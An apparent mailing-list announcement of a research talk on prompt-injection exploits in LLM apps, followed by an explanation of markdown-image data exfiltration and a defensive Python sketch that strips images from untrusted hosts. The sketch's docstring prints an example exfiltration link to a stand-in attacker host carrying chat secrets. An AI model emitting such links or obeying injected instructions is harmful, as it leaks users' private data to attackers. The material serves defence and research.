SIGSEC talk: 11 Jan - New Important Instructions: Real-world exploits and mitigations in LLM Apps

Leon Derczynski

Jan 9, 2024, 5:33:52 AM
to acl-s...@googlegroups.com
Happy new year! A spicy new talk to start us off, from the discoverer of the markdown chat exfiltration exploits:

New Important Instructions: Real-world exploits and mitigations in LLM Apps
January 11th, 2024, 11:00 ET / 17:00 CET

Johann Rehberger (@wunderwuzzi23)

With the widespread rollout of chatbots and LLM applications, users face increased risks of scams, data exfiltration, loss of PII, and even remote code execution when processing untrusted data with LLM apps. This presentation will demonstrate many real-world exploits in prominent LLM apps, including automatic plugin/tool invocation and data exfiltration in ChatGPT, and data exfiltration in Bing Chat, Anthropic Claude, and Google Bard. The talk also highlights approaches vendors have taken to fix these vulnerabilities. Finally, we take a look at how ChatGPT Builder can be used to create a malicious GPT that, while seemingly benign, tricks users and steals data.
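
For anyone new to the markdown exfiltration class mentioned above: an injected prompt can make the model emit a markdown image whose URL carries chat data, and the client leaks that data to the attacker's server the moment it fetches the image. Below is a minimal, hypothetical Python sketch of one mitigation in the spirit of the fixes the talk covers, allowlisting image domains before rendering model output; the host names and function are illustrative, not taken from the talk.

    # Sketch only: strip markdown images pointing at untrusted hosts
    # before the chat client renders the model's output.
    import re
    from urllib.parse import urlparse

    ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical trusted host

    MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

    def strip_untrusted_images(llm_output: str) -> str:
        """Remove markdown images whose URL host is not allowlisted.

        An injected prompt can make the model emit something like
        ![x](https://attacker.example/?q=<chat secrets>); auto-rendering
        the image leaks the query string to the attacker.
        """
        def check(match: re.Match) -> str:
            host = urlparse(match.group(1)).hostname or ""
            return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
        return MD_IMAGE.sub(check, llm_output)

    # The attacker-controlled image is stripped; the trusted one is kept.
    print(strip_untrusted_images(
        "![logo](https://cdn.example.com/logo.png) "
        "![x](https://attacker.example/?q=SECRET)"
    ))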


Calendar link at https://sig.llmsecurity.net/talks/

See you there!!